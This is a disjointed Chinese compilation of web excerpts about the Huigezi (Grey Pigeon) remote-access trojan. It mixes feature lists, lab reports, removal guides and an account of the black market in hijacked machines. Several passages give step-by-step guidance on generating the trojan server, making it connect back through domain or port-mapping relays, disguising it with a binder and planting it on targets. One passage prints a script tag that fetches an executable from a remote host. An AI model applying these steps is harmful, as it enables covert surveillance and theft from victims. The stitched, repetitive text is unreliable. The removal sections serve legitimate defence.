关于灰鸽子的原理以及制作和清理

合集下载

如何使用灰鸽子软件

如何使用灰鸽子软件

灰鸽子[VIP 专业版]1.只用一个端口来传输所有通讯数据!普通同类软件都用到了两个或两个以上的端口来完成!2.支持可以控制Internet连接共享、HTTP透明代理上网的电脑!软件智能读取系统设定的代理服务器信息,无需用户设置!3.无需知道服务端IP,自动上线功能让服务端自动上线报道!灰鸽子专用的上线系统无需您注册免费域名才能使用,同时也提供了备用上线方式,在我们的专用上线系统出现故障时,您可以使用备用上线方式来使用自动上线功能。

在使用专用上线系统时,你还可以控制远程电脑通过Socks5代理来中转自动上线。

4.自动上线可以在第一次设置分组,自定义上线图像,上线备注等,这样都可以让你轻而易举的找到目标主机,同时设置连接密码保证了服务主机的安全性!同时具用牵手版的搜索符合条件主机的功能:a.从主机窗口筛选:可以列出只有某个窗口的一批主机,可以轻松找到哪些人在玩某个游戏!b.从主机进程筛选:可以列出运行了某个程序的一批主机,例如QQ.exe,就可以找到打开了QQ的自动上线主机有哪些了!5.文件管理:管理远程电脑的文件系统,支持复制、粘贴、删除,断点下载、上传文件或文件夹,文件内容均以加密方式传输,确保通讯的安全性.6.远程控制命令:包括远程系统信息、剪切板信息、进程管理、窗口管理、键盘记录、服务管理、管理管理、MS-DOS模拟、代理服务控制!7.注册表编辑器:可以像操作本机注册表一样的编辑远程注册表。

8.常用命令广播,让你控制主机众多主机更多的方便!详细的在线主机线表显示了:主机IP地址,地址位置,电脑名称,系统版本,备注等信息,9.除了具有语音监听、语音发送,还有远程视频监控功能,只有远程计算机有摄像头,且正常打开没有被占用,那么你可以看到,远程摄像头捕获的图片!还可以把远程摄像头捕获的画面存为Mpeg-1格式.远程语音也可以录制成Wav声音文件。

10.可以设置服务端开放Socks5代理服务器功能和HTTP代理服务功能!无需第三方软件支持!支持Windows9x/ME/2000/Xp/2003。

灰鸽子病毒检测及清除的手段方法

灰鸽子病毒检测及清除的手段方法

4、根据灰鸽子原理分析我们知道,如果Game_Hook.DLL是灰鸽子的文件,则在操作系统安装目录下还会有Game.exe和Game.dll文件。打开Windows目录,果然有这两个文件,同时还有一个用于记录键盘操作的GameKey.dll文件。
[img][/img]
经过这几步操作我们基本就可以确定这些文件是灰鸽子服务端了,下面就可以进行手动清除。
2000/XP系统:
1、打开注册表编辑器(点击“开始”-》“运行”,输入“Regedit.exe”,确定。),打开HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services注册表项。
2、点击菜单“编辑”-》“查找”,“查找目标”输入“game.exe”,点击确定,我们就可以找到灰鸽子的服务项(此例为Game_Server,每个人这个服务项名称是不同的)。
灰鸽子病毒 是一个免杀的远程控制软件,但是作为病毒使用也很方便
一、灰鸽子病毒详细简介
灰鸽子是国内一款著名后门。比起前辈冰河、黑洞来,灰鸽子可以说是国内后门的集大成者。其丰富而强大的功能、灵活多变的操作、良好的隐藏性使其他后门都相形见绌。客户端简易便捷的操作使刚入门的初学者都能充当黑客。当使用在合法情况下时,灰鸽子是一款优秀的远程控制软件。但如果拿它做一些非法的事,灰鸽子就成了很强大的黑客工具。这就好比火药,用在不同的场合,给人类带来不同的影响。对灰鸽子完整的介绍也许只有灰鸽子作者本人能够说清楚,在此我们只能进行简要介绍。
1、由于灰鸽子的文件本身具有隐藏属性,因此要设置Windows显示所有文件。打开“我的电脑”,选择菜单“工具”—》“文件夹选项”,点击“查看”,取消“隐藏受保护的操作系统文件”前的对勾,并在“隐藏文件和文件夹”项中选择“显示所有文件和文件夹”,然后点击“确定”。

灰鸽子实验报告

灰鸽子实验报告

实验报告实验名称灰鸽子木马实验报告课程名称网络安全院系部:信息技术系专业班级:网络101学生姓名:学号:***********一、实验目的及要求:[目的]1、了解灰鸽子是一个集多种控制方法于一体的木马病毒。

[内容及要求]1、练习软件的哪些功能,自己总结2、通过实验了解灰鸽子是一款的远程控制软件。

3、熟悉使用木马进行网络攻击的原理和方法。

[试验环境]虚拟机下安装组建一个局域网,2台安装了win2000/win2003/XP系统的电脑,灰鸽子木马软件。

二、实验方法与步骤:(1)打开虚拟机,开启windows server 2003 A 与 windows server 2003 B ,将其网络设备器设置在同一局域网内(例vmnet2)(2)打开灰鸽子,并查看本机IP地址:(3)点击配置服务程序,新建一个木马病毒:密码可设置也可不设置(3)将生产的木马病毒设法放入目标主机,并使其运行:(原始木马样子)(4)目标主机运行后,本机灰鸽子显示其登录:我们可对目标及进行,下载上传等基本运行(5)还可以进行更深层次的控制,例如屏幕捕捉与控制,广播,关机开机,注册表的编辑等(看红框标识处):(6)灰鸽子木马的伪装,木马捆绑器:现今社会杀毒软件的辨识度已然很高,而人们的警惕度也越来越高,木马若想成功的被目标主机运行,必然要做一定的伪装生成一个可执行文件,虽然风险乜很高,但不失为一种方法!(6)木马分离器:三、使用心得(1)熟悉灰鸽子之后,我们了解了木马的强大以及危害之处,如何防范木马,是当今信息社会的一种不可不重视的问题。

计算机病毒泛滥尤以木马病毒为甚。

木马病毒是一种远程控制程序,“黑客”利用计算机系统和软件的漏洞将一段程序植入远端电脑后,可以借助其配套的控制程序来远程控制中毒电脑,肆无忌惮地查看、下载他人电脑中的内容。

掌握了它的原因,对于防护电脑避免木马入侵我们应该有一定对策!(2)如何防范木马病毒:一、检测网络连接二、禁用不明服务三、轻松检查账户四、及时修补漏洞和关闭可疑的端口五、安装杀毒软件并及时更新六、运行实时监控程序。

灰鸽子实验

灰鸽子实验

灰鸽子远控软件使用实验
“灰鸽子”是现在网络上非常流行的一种木马,由两部分组成,一是控制端(主程序),一是服务端(也叫受控端)。

任一部分都会被主流的杀毒软件查杀,但随着其不断衍生新的变种和一些免杀技巧经常绕过一些主动防御软件,使得用户防不胜防。

灰鸽子客户端和服务端都是采用Delphi编写。

黑客利用客户端程序配置出服务端程序。

可配置的信息主要包括上线类型(如等待连接还是主动连接)、主动连接时使用的公网IP(域名)、连接密码、使用的端口、启动项名称、服务名称,进程隐藏方式,使用的壳,代理,图标等等。

“灰鸽子”的服务端是由控制端主程序配置自动生成,黑客在配置自动上线的时候一般会用到ftp自动上线和动态域名解析两种手法,目的是让鸽子以后每天都会自动上线,而不受自身IP改变的影响。

当配置好服务端后,黑客会利用一切可能的手段达到入侵的目的,当用户电脑“中马”后,黑客就会拥有用户电脑的最高管理权限,包括随意修改、窃取用户电脑的文件,监控电脑的键盘和屏幕、摄像头等等。

在主控端生成灰鸽子木马
把灰鸽子生成的服务端拷贝到受控端
对受控端进行一系列的操作对受控端进行监控
屏幕监控
系统信息
文件下载
实验总结
在日常生活中一些不法分子会利用一些邮件、网站的连接放置木病毒,所以在看到一些可疑的连接不要轻易去点击,一旦点击便会中木马病毒。

因此遇到一些不明的连接的情况下,一定要警惕,不要轻易点击陌生的连接。

灰鸽子基础原理

灰鸽子基础原理
通过这两个例子,细心的朋友不难发现,关键在于“自动上线设置”,这个就是一个地址,让肉鸡能找到你家的地址。只要你给肉鸡明确的地址,它就能找到你。1.本地电脑为静态IP,则配置服务端上线IP可以直接写上静态IP,无需域名转向。
2.本地电脑为动态IP,,则配置服务端可以用域名转向,也就是上面举的例子。
不能上线。
这里我得解释一个问题,内网环境下,电脑要和外界通信,必须得通过路由器,这就相当于路由器把它之下的电脑与外界隔离。
如果在电脑与路由器之间铺设一条路,通向外面,这样鸽子就能上线。具体来说,就是路由器开放8000端口与你的电脑直接相连,这样,鸽子
找到路由器,看到8000端口,就会由8000端口进来连接你的电脑,这样鸽子就找到我们的电脑,鸽子就上线了。
这样肉鸡2运行灰鸽子服务端后,会连接肉鸡1的8000端口,但此时肉鸡1并没有开放8000端口。这时我们在本地用端口映射工具控制端选择“映射”,这样肉鸡1就会开放8000端口,并把来自8000端口的连接转向我们本地电脑,也就是会把肉鸡2的连接转到我们本地电脑。这样鸽子就上线了。概括的说,就是,肉鸡2连接肉鸡1的8000端口,而肉鸡1会把来自8000端口的连接转到我们本地电脑。.
比如,先举个简单直观的例子。寝室有3台电脑,用交换机相连,这就意味着这3台电脑是不能接入互连网的。但彼此间可以通信。我们分别把3台电脑的IP 设置为192.168.0.1、192.168.0.2、192.168.0.3。假设我电脑的IP为其中一台,IP为第一个。如果我来配置服务端,打开灰鸽子,点击“配置服务程序”——“自动上线设置”处。我们添192.168.0.1,其他的选项不用管。直接点“生成服务器”这样就配置好了。你让另外2台电脑运行,或自己运行,都可以,都会上线,因为服务端很容易就找到了你的IP 192.168.0.1,并上线。这就好比,你养了只聪明的鸽子,你告诉它你的地址,这样每次它都会飞回来。

浏览网页中木马的原理和防范--灰鸽子网页木马的制作和解析

浏览网页中木马的原理和防范--灰鸽子网页木马的制作和解析

浏览网页中木马的原理和防范--灰鸽子网页木马的制作和解析1.网页木马从原理如果你访问××网站(国内某门户网站),你就会中灰鸽子木马。

这是我一黑客朋友给我说的一句说。

打开该网站的首页,经检查,我确实中了灰鸽子。

怎么实现的呢?他说,他侵入了该网站的服务器并在网站主页上挂了网页木马;一些安全专家常说,不要打开陌生人发来的网址,为什么?因为该网址很有可能就是一些不怀好意者精心制作的网页木马。

以上只是网页木马的两种形式,实际上网页木马还可以挂在多媒体文件(RM、RMVB、WMV、WMA、Flash)、电子邮件、论坛等多种文件和场合上。

很可怕吧,那么用户如何防范网页木马呢?下面我们就先从网页木马的攻击原理说起。

一、网页木马的攻击原理首先明确,网页木马实际上是一个HTML网页,与其它网页不同的是该网页是黑客精心制作的,用户一旦访问了该网页就会中木马。

为什么说是黑客精心制作的呢?因为嵌入在这个网页中的脚本恰如其分地利用了IE浏览器的漏洞,让IE在后台自动下载黑客放置在网络上的木马并运行(安装)这个木马,也就是说,这个网页能下载木马到本地并运行(安装)下载到本地电脑上的木马,整个过程都在后台运行,用户一旦打开这个网页,下载过程和运行(安装)过程就自动开始。

有朋友会说,打开一个网页,IE浏览器真的能自动下载程序和运行程序吗?如果IE真的能肆无忌惮地任意下载和运行程序,那天下还不大乱。

实际上,为了安全,IE浏览器是禁止自动下载程序特别是运行程序的,但是,IE浏览器存在着一些已知和未知的漏洞,网页木马就是利用这些漏洞获得权限来下载程序和运行程序的。

下面我举IE浏览器早期的一个漏洞来分别说明这两个问题。

⒈自动下载程序<SCRIPT LANGUAGE="icyfoxlovelace" src="hxxp:///1.exe"></SCRIPT>小提示:代码说明a. 代码中“src”的属性为程序的网络地址,本例中“/1.exe”为我放置在自己Web服务器上的灰鸽子服务端安装程序,这段代码能让网页下载该程序到浏览它的电脑上。

灰鸽子病毒(Backdoor.Gpigeon)介绍及清除方法-电脑资料

灰鸽子病毒(Backdoor.Gpigeon)介绍及清除方法-电脑资料

灰鸽子病毒(Backdoor.Gpigeon)介绍及清除方法-电脑资料
灰鸽子的特点是“三个隐藏”——隐藏进程、隐藏服务、隐藏病毒文件,。

灰鸽子2005感染系统后,将自身注册为系统服务,并在同一目录下生成一组(3个)隐藏的病毒文件.
HijackThis是荷兰学生merijn开发系统扫描工具,能够扫描系统版本,进程,启动项,服务项等信息,对于分析解决IE浏览器问题,以及分析病毒,木马问题有很大帮助
HijackThis扫描的log可用记事本打开。

用HijackThis 1.99.1 扫描系统信息,可以帮助解决问题
下载地址:
扫描出的结果很多都是无害的甚至是正常系统必须的,如果不是非常有把握,请勿修改!
使用方法: 解压到一个文件夹,运行HijackThis“扫描系统并保存日志”,把日志文件保存到桌面,然后用记事本打开那个文件,找到病毒所在处.
复以下项目:O23 - NT 服务: pms (Portable Media Serial) - Unknown owner - C:/WINDOWS/IEXPL0RE.EXE !
修复后重启电脑,全盘杀毒,
电脑资料
《灰鸽子病毒(Backdoor.Gpigeon)介绍及清除方法》(https://www.)。

在“安全模式”下,在“文件夹选项”的“查看”面板中勾选“显示系统文件夹内容”、“显示所有文件及文件夹”两个选项,按“确定”按钮。

根据HijackThis日志中提示的病毒文件所在路径,找到病毒文件,删除之。

重启系统,手工杀毒即告完成。

怎么样才能彻底清除“灰鸽子”病毒

怎么样才能彻底清除“灰鸽子”病毒

怎么样才能彻底清除“灰鸽子”病毒灰鸽子病毒,像鸽子一样,飞的快,传染快,那么我们要怎么彻底打掉这只飞的快的“鸽子”呢?下面由店铺给你做出详细的彻底清除灰鸽子病毒介绍!希望对你有帮助!彻底清除灰鸽子病毒介绍:手工清除灰鸽子并不难,重要的是我们必须懂得它的运行原理。

灰鸽子的运行原理灰鸽子木马分两部分:客户端和服务端。

黑客(姑且这么称呼吧)操纵着客户端,利用客户端配置生成出一个服务端程序。

服务端文件的名字默认为G_Server.exe,然后黑客通过各种渠道传播这个木马(俗称种木马或者开后门)。

种木马的手段有很多,比如,黑客可以将它与一张图片绑定,然后假冒成一个羞涩的MM通过QQ把木马传给你,诱骗你运行;也可以建立一个个人网页,诱骗你点击,利用IE漏洞把木马下载到你的机器上并运行;还可以将文件上传到某个软件下载站点,冒充成一个有趣的软件诱骗用户下载……G_Server.exe运行后将自己拷贝到Windows目录下(98/xp下为系统盘的windows目录,2k/NT下为系统盘的Winnt目录),然后再从体内释放G_Server.dll和G_Server_Hook.dll到windows目录下。

G_Server.exe、G_Server.dll和G_Server_Hook.dll三个文件相互配合组成了灰鸽子服务端,有些灰鸽子会多释放出一个名为G_ServerKey.dll的文件用来记录键盘操作。

注意,G_Server.exe这个名称并不固定,它是可以定制的,比如当定制服务端文件名为A.exe 时,生成的文件就是A.exe、A.dll和A_Hook.dll。

Windows目录下的G_Server.exe文件将自己注册成服务(9X系统写注册表启动项),每次开机都能自动运行,运行后启动G_Server.dll 和G_Server_Hook.dll并自动退出。

G_Server.dll文件实现后门功能,与控制端客户端进行通信;G_Server_Hook.dll则通过拦截API调用来隐藏病毒。

灰鸽子

灰鸽子

灰鸽子产业链一、灰鸽子灰鸽子(Hack. Huigezi)是一个集多种控制方法于一体的木马病毒,一旦用户电脑不幸感染,可以说用户的一举一动都在黑客的监控之下,要窃取账号、密码、照片、重要文件都轻而易举。

更甚的是,他们还可以连续捕获远程电脑屏幕,还能监控被控电脑上的摄像头,自动开机(不开显示器)并利用摄像头进行录像。

截至2006年底,“灰鸽子”木马已经出现了6万多个变种。

客户端简易便捷的操作使刚入门的初学者都能充当黑客。

当使用在合法情况下时,灰鸽子是一款优秀的远程控制软件。

但如果拿它做一些非法的事,灰鸽子就成了很强大的黑客工具。

二、产业链在灰鸽子中,木马的制造者作为第一个环节,仅仅是提供"作案"工具,一般本身不参与到"赚钱"的环节,只是通过卖出"工具"来获利.而传播病毒环节则在购买到病毒之后,再提高价格,一级一级卖给下层的病毒购买者,非常类似于普通产品的经销商模式.木马病毒经过层层传递之后,达到病毒操作者的手里,也就是行话中的"大侠","大侠"在自己进行盗窃,破坏网络的同时召集"徒弟", 教授木马病毒控制技术和网络盗窃技术, 并收取一定的"培训费", 同时将"徒弟"发展为下线,专职盗号或窃取他人信息.被木马侵入的电脑则被形象的称为"肉鸡", "肉鸡"的个人信息,账号,游戏装备,私人照片,私人视频,QQ 号码等被专职盗号的黑客盗取后在网上的正规交易网站正常交易. 除了倒卖"肉鸡"中的数据外, 黑客们还可能将自己没有兴趣的"肉鸡"倒卖给其他的黑客继续摧残, 或者将"肉鸡"倒卖给广告商, 被控制电脑被随意投放广告,甚至干脆控制电脑点击某网站广告,一举一动都能被监视和控制. 如此严密的黑色经济产业链条令人触目惊心. 不仅有严密的产业链条,黑色经济的价格体系也非常完善.据黑客界有关人士介绍, 能够使用几天的"肉鸡"在国内可以卖到0.5 元到1 元一只, 如果可以使用半个月以上, 则可卖到几十元一只.而且不同地区的"肉鸡",价格也不一样:内陆"肉鸡"0.1——0.4 元一只, 辽宁"肉鸡"0.5——0.8 元一只, 广东"肉鸡"1 元一只, 港台"肉鸡"3 块一只, 外国"肉鸡"则能买到5 元一只,在即将到来的北京奥运期间,"奥运肉鸡"将更加抢手.三、产业链具体介绍木马、肉鸡、灰鸽子……这些圈外人刚刚听说的网络用语,构成的不仅是一个庞大的、黑色的、暴利的地下产业帝国,更是一个侵犯网民个人隐私、盗窃网络无形财产的罪恶瘟疫,游戏账号、QQ 密码、银行账号……电脑用户的个人信息和财产被一个个网络黑手窃为己有,而这一切只需要一个软件。

灰鸽子木马实验报告

灰鸽子木马实验报告

病毒防治实验报告学生姓名学号专业班级指导教师学院信息科学与工程学院完成时间2014年4月一.实验目的及要求目的:了解灰鸽子是一个集多种控制方法于一体的木马病毒。

二.内容及要求1.练习软件的哪些功能,自己总结2.通过实验了解灰鸽子是一款远程控制软件。

3.熟悉使用木马进行网络攻击的原理和方法。

实验环境:虚拟机下安装组建一个局域网,2台安装win2000/win2003/XP系统的电脑,灰鸽子木马软件。

二.实验方法与步骤:1)打开虚拟机通过实验室的实验平台打开网站192.168.1.1:8088/limp开始试验-选择灰鸽子木马实验打开2个虚拟机,1号机作为服务器,2号机作为客户端。

在拓扑结构上的连接2太虚拟机。

通过PING (对方的IP)验证是否连接成功。

2)打开客户端屏幕上的灰鸽子木马文件,运行EXE文件。

3)木马制作首先配置服务程序123在自动上线设置的IP通知中填写本机的IP地址可以通过-运行-cmd-ipconfig查找本机的IP地址4高级设置这是显示在进程中的描述设置然后点击生成服务器。

5木马种植--将生成的服务器转移到服务器(肉鸡)上通过漏洞或溢出得到远程主机权限,上传并运行灰鸽子木马本地对植入灰鸽子的主机进行连接,看是否能连接灰鸽子。

(若无法获得远程主机权限可将生成的服务器程序拷贝到远程主机并运行)如果成功,则会出现通过-cmd-netstat -na查看所有的连接,确定连接成功。

可以通过捕捉屏幕和视频语言对目标服务器进行监控,或者通过Telnet对其进行控制。

6查看进程启动ICESWORD检查开放进程,进程中多出了IEXPLORE.exe 进程,这个进程即是启动灰鸽子木马的进程,起到隐藏灰鸽子木马自身的程序的目的。

7感想计算机病毒很可怕,他会在不知不觉中使我们被监控,财产处于危险中。

所以要做好防治病毒的工作。

灰鸽子处理

灰鸽子处理

灰鸽子是国内一款著名后门程序。

其丰富而强大的功能、灵活多变的操作、良好的隐藏性使其他后门程序都相形见绌。

如果使用在合法的情况下,灰鸽子将是一款优秀的远程控制软件。

如果拿他去做一些非法的事,灰鸽子就成了强大的黑客工具。

1、在控制端生成灰鸽子木马服务器端程序(1)双击启动灰鸽子客户端,如图3.1所示:图3.1灰鸽子客户端(2)单击“配置服务程序”,为被控制端生成服务器安装程序。

设置通知IP(灰鸽子客户端所在计算机的IP)和保存路径。

如图3.2所示:图3.2 配置服务程序(3)单击右下角的“生成服务器”,将会生成“Server_setup.exe”文件。

2、在被控端计算机上安装灰鸽子木马服务器端程序(1)将生成的“Server_setup.exe”文件上传或复制到被控计算机中。

(2)运行服务器端安装程序“Server_setup.exe”文件。

3、在主控机上利用灰鸽子远程控制被控机(1)在主控机上运行灰鸽子程序。

(2)在“自动上线”列表中对应计算机下即可看到被控机的全部硬盘数据。

如图3.3所示:图3.3 查看被控计算机的信息(3)可以随意打开一个文件夹,随意的进行删除、移动或者复制、粘贴等操作。

(4)还可以启动或停止被控计算机的服务,或修改其注册表。

如图 3.4和图3.5所示:图3.4 启动或停止被控计算机的服务图3.5 查看被控计算机的注册表信息(5)通过单击工具栏的“屏幕控制”,打开被控端的桌面,监视被控端桌面上的任何操作。

4、手动清除灰鸽子因为灰鸽子的威力很大,如果使用不当会给公司的网络造成很大的危害。

下面具体讲解如何通过手动方式来清除灰鸽子:(1)启动计算机,在系统进入Windows启动画面前,按下“F8”键在出现的启动选项菜单中,选择“安全模式”。

(2)打开“我的电脑”,选择菜单“工具”中的“文件夹选项”命令,选择“查看”选项卡,取消“隐藏受保护的操作系统文件”复选框,并在“隐藏文件和文件夹”项中选择“显示所有文件和文件夹”单选按钮,然后单击“确定”按钮。

灰鸽子利用教程图解

灰鸽子利用教程图解

灰鸽子利用教程图解(考虑到灰鸽子技术性较强和传插黑客技术要低调,将网络人远程控制教程放第一部份,灰鸽子教程放在了文章后面第二部份,请大家耐心观看)第一部份:网络人远程监控软件网络人远程控制个人版分为Netman办公版与Netman监控版。

两个版本主要区别在于:Netman办公版连接远程电脑时,对方会弹出提示,明白电脑正在远程连接,主要用于个人远程控制、远程办公、远程协助和远程桌面连接等方面利用,是一款免费的远程控制软件;Netman监控版利用会员登录后再连接,远程电脑无任何提示,对方不会觉察,主要用于监管孩童电脑,掌握孩子上网情形,保护孩子健康上网。

Netman监控版详细安装方式:1.要实现远程监控控制,两边都要安装Netman监控版,两边电脑的安装方式一样,控制端同时也是被控端,只要明白ID和密码,两边能够彼此控制。

2.下载软件解紧缩后,双击“Netman监控版.EXE”,软件默许安装路径为“C:\Program Files\Netman”,能够自己修改,但安装路径需要记住,因为启动软件桌面上不会新建快捷方式,需要自己进入安装文件夹,双击启动软件,这时会弹出一个提示窗口,问是不是要让软件随系统启动,通常直接点“肯定”。

3.完成以上操作后,再按ctrl+y即可呼出软件主界面。

监控版必需利用会员登录才能实现监控功能,所以呼出主界面后,应点击免费注册会员。

4.注册好会员后,点“选项”-“会员登录”,填上注册好的会员号。

5.第一次利用会员登录时,会弹出“设置控制密码”选项,需要注意的是,这里修改的不是前面填写的“登录密码”,而是从其他电脑连接本电脑时需要输入的“控制密码”。

很多用户会误以为这里是修改“登录密码”,致使第二次利用会员登录时,发觉登录密码不正确。

出于安全考虑,网络人设置了“登录密码”与“控制密码”两道密码保护,“登录密码”用于登录会员ID,“控制密码”则是其他电脑想要控制本地电脑时所需要填写的密码。

灰鸽子原理及技术分析

灰鸽子原理及技术分析

一禁用系统恢复使用组策略编辑器1. 单击开始,单击运行,键入gpedit.msc,然后单击确定。

2. 展开“计算机配置”,展开“管理模板”,展开“系统”,然后单击系统恢复。

3. 双击“关闭系统恢复”,然后在设置选项卡上,选择禁用。

4. 双击“关闭配置”,然后在设置选项卡上,选择启用。

有关这些设置的作用的详细信息,请在单击属性对话框上的解释选项卡。

5. 单击应用,然后单击确定。

二升级病毒定义库Symantec 可LIVEUPDA TE,NORTON也能吧三在安全模式扫描,并删除感染文件操作后可离开安全模式,跳到四四删除注册表键值Symantec强烈建译备份注册表.click 开始>运行-- 输入regedit,确定后进入HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Connection Wizard删除右侧值: "Compleated" = "1"再进入,删除下列键(key)HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\GrayPigeonServerHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_GRAYPIGEONSERVER离开注册表编辑器五查找并停止服务click 开始>运行-- 输入services.msc,确定后进入定位并选择探测到的Trojan.Feutel服务点吉动作(Action)>属性(Properties),点吉停止改变启动类型为手动点吉确定,关闭服务窗口重启XfeliX关于Trojan.Feutel(灰鸽子)病毒无法清除的解决办法前段时间浏览网页的时候,杀毒软件报告发现病毒Trojan.Feutel,病毒位于c:\windiwos,文件名称为G_Server.exe、G_Server.dll和G_Server_Hook.dll,而且杀毒软件无法清除,感觉应该是中了恶意代码(木马)。

灰鸽子原理

灰鸽子原理

灰鸽子原理(一)灰鸽子是国内一款著名后门。

比起前辈冰河、黑洞来,灰鸽子可以说是国内后门的集大成者。

其丰富而强大的功能、灵活多变的操作、良好的隐藏性使其他后门都相形见绌。

客户端简易便捷的操作使刚入门的初学者都能充当黑客。

当使用在合法情况下时,灰鸽子是一款优秀的远程控制软件。

但如果拿它做一些非法的事,灰鸽子就成了很强大的黑客工具。

这就好比火药,用在不同的场合,给人类带来不同的影响。

对灰鸽子完整的介绍也许只有灰鸽子作者本人能够说清楚,在此我们只能进行简要介绍。

灰鸽子客户端和服务端都是采用Delphi编写。

黑客利用客户端程序配置出服务端程序。

可配置的信息主要包括上线类型(如等待连接还是主动连接)、主动连接时使用的公网IP(域名)、连接密码、使用的端口、启动项名称、服务名称,进程隐藏方式,使用的壳,代理,图标等等。

连接密码的设定使得灰鸽子服务端程序只能被配置它的黑客控制,避免了黑客之间的竞争。

服务端对客户端连接方式有多种,使得处于各种网络环境的用户都可能中毒,包括局域网用户(通过代理上网)、公网用户和ADSL拨号用户等。

只用一个端口来传输所有通讯数据!普通同类软件都用到了两个或两个以上的端口来完成。

支持可以控制Internet连接共享、HTTP透明代理上网的电脑!软件智能读取系统设定的代理服务器信息,无需用户设置!可以设置服务端开放Socks5代理服务器功能和HTTP代理服务功能!无需第三方软件支持!支持Windows9x/ME/2000/Xp/2003。

便于黑客进行跳板攻击。

除了具有语音监听、语音发送,还有远程视频监控功能,只有远程计算机有摄像头,且正常打开没有被占用,那么你可以看到,远程摄像头捕获的图片!还可以把远程摄像头捕获的画面存为Mpeg-1格式.远程语音也可以录制成Wav声音文件。

其他后门具有的功能,你几乎都可以在灰鸽子里找到。

而且每个功能都做的非常细致,非常人性化。

整体界面比较清爽,容易上手,对每一个小细节的考虑都很到位,所有能想到的Ideal几乎都实现了。

灰鸽子木马原理

灰鸽子木马原理

灰鸽子木马原理
灰鸽子木马原理
灰鸽子木马是一种常见的网络攻击手段,它的原理是通过植入恶意代码,控制被攻击计算机的行为,从而达到攻击者的目的。

下面将详细
介绍灰鸽子木马的原理。

1. 植入恶意代码
灰鸽子木马的第一步是植入恶意代码。

攻击者可以通过各种方式将恶
意代码植入到目标计算机中,比如通过电子邮件、网络钓鱼等方式。

一旦恶意代码被植入到计算机中,它就会开始执行攻击者的指令。

2. 控制被攻击计算机
一旦恶意代码被植入到计算机中,攻击者就可以通过远程控制的方式
控制被攻击计算机的行为。

攻击者可以利用被攻击计算机的资源,比
如计算能力、存储空间等,进行各种恶意活动,比如发起DDoS攻击、窃取敏感信息等。

3. 隐藏行踪
为了避免被发现,攻击者通常会采取一些措施来隐藏自己的行踪。

比如,他们可能会使用代理服务器或虚拟专用网络(VPN)来隐藏自己的IP地址,或者使用加密技术来保护通信内容,使其难以被监测和识别。

总之,灰鸽子木马是一种非常危险的网络攻击手段,它可以给受害者带来严重的损失。

为了保护自己的计算机安全,我们应该时刻保持警惕,不要轻易打开来路不明的邮件和链接,同时也要安装好杀毒软件和防火墙,及时更新系统和软件补丁,以提高自己的计算机安全防护能力。

灰鸽子木马原理

灰鸽子木马原理

灰鸽子木马原理灰鸽子木马是一种具有高度隐蔽性和破坏力的恶意软件,其原理基于社会工程学和网络攻击技术。

它通过诱骗用户点击伪装成正常文件或链接的恶意程序,从而实现对目标系统的入侵和控制。

本文将详细介绍灰鸽子木马的原理及其对网络安全的威胁。

一、灰鸽子木马的传播方式灰鸽子木马传播的主要方式是通过电子邮件、社交媒体、P2P软件等渠道传播。

攻击者会利用社会工程学手段,伪装成可信的来源,诱使用户点击恶意链接或下载恶意附件。

一旦用户受骗,恶意软件便会悄无声息地运行在用户的计算机上。

二、灰鸽子木马的工作原理灰鸽子木马的工作原理可以分为三个主要阶段:潜伏、入侵和控制。

1. 潜伏阶段:灰鸽子木马首先潜伏在目标系统中,它会自动在系统中创建隐藏的文件和注册表项,以保证自身的持久性。

在这个阶段,灰鸽子木马会尽可能地隐藏自己,避免被用户或防病毒软件发现。

2. 入侵阶段:一旦潜伏成功,灰鸽子木马将利用漏洞或弱密码等方式入侵目标系统。

它会通过网络传输协议与控制服务器建立连接,获取控制指令并执行。

攻击者可以通过灰鸽子木马远程控制目标系统,窃取敏感信息或进行其他恶意活动。

3. 控制阶段:在控制阶段,攻击者可以远程操控被感染的系统,执行各种指令。

他们可以窃取用户的个人信息、银行账户密码等敏感数据,也可以利用被感染的计算机进行DDoS攻击、发送垃圾邮件等恶意行为。

三、灰鸽子木马对网络安全的威胁灰鸽子木马作为一种高级威胁,给网络安全带来严重威胁。

1. 用户隐私泄露:灰鸽子木马可以窃取用户的个人信息、登录凭证、银行卡信息等敏感数据,从而导致用户隐私泄露和财产损失。

2. 网络攻击:攻击者可以通过灰鸽子木马远程控制目标系统,将其作为攻击平台,发起DDoS攻击、扫描其他目标等,对网络安全造成重大影响。

3. 信息窃取和利益盗窃:灰鸽子木马可以窃取企业的商业机密、研发数据等重要信息,给企业带来巨大经济损失。

四、如何保护自己免受灰鸽子木马的侵害为了保护自己的计算机和网络安全,我们可以采取以下措施:1. 慎重点击链接和下载附件:不要随意点击邮件中的链接或下载附件,尤其是来自不明或可疑来源的邮件。

木马灰鸽子防护

木马灰鸽子防护

木马灰鸽子防护场景灰鸽子是国内一个著名的后门程序。

灰鸽子变种木马运行后,会自我复制到Windows目录下,并自行将安装程序删除。

修改注册表,将病毒文件注册为服务项实现开机自启。

木马程序还会注入所有的进程中,隐藏自我,防止被杀毒软件查杀。

自动开启IE浏览器,以便与外界进行通信,侦听黑客指令,在用户不知情的情况下连接黑客指定站点,盗取用户信息、下载其它特定程序。

通过对灰鸽子的运行过程及原理进行了解,掌握对木马的防御实验目标●掌握木马的原理●通过木马对主机控制过程的了解,掌握防御方法●树立安全的防范意识●可以根据环境要求设定有效的防范策略实验拓扑VM Server VM Client实验环境Server:Windows XP[服务端](因实验需要 Server 服务端登录账户:administrator,密码:123456)Client:Windows XP[客户端]灰鸽子[企业版]Server_Setup.exe服务端木马(可由灰鸽子生成)灰鸽子专杀工具[工具]利用灰鸽子进行控制灰鸽子木马程序版本众多,这里我们选择了使用较多的“灰鸽子远程管理企业版Build060228”版本。

【注释】安装灰鸽子客户端程序,目的为了控制被种植了灰鸽子服务端程序的肉鸡,客户端本身没有危害性。

1.在客户端上运行“灰鸽子[企业版]”程序,主界面如图 1:(图1)2.点击工具栏中的“配置服务程序”按钮,弹出如图2对话框,可根据自己要求定制生成服务端程序,用于种植在肉鸡中。

(图2)【注释】用户可以定制肉鸡服务端开放的端口、连接密码、控制权限等。

自动上线功能可以在肉鸡启动时,自动告知控制者上线信息。

3.添加好相应的信息后,点击“生成服务器”按钮,可以生成EXE可执行程序。

这里我们在C盘根目录已经提供了一个生成好的服务端程序Server_Setup.exe,其连接端口为7812,连接密码为7812,具有所有控制权限。

